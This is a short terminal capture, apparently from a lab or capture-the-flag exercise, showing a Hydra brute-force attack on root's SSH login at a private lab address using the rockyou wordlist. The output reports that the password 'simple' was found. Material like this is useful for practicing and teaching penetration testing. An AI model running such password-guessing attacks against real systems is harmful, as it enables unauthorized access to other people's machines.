1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| ┌──(root㉿kali)-[/home/ace] └─# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.142 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-11 10:17:12 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.56.142:22/ [STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active [22][ssh] host: 192.168.56.142 login: root password: simple [STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 3 to do in 00:01h, 9 active 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 5 final worker threads did not complete until end. [ERROR] 5 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-11 10:20:28
|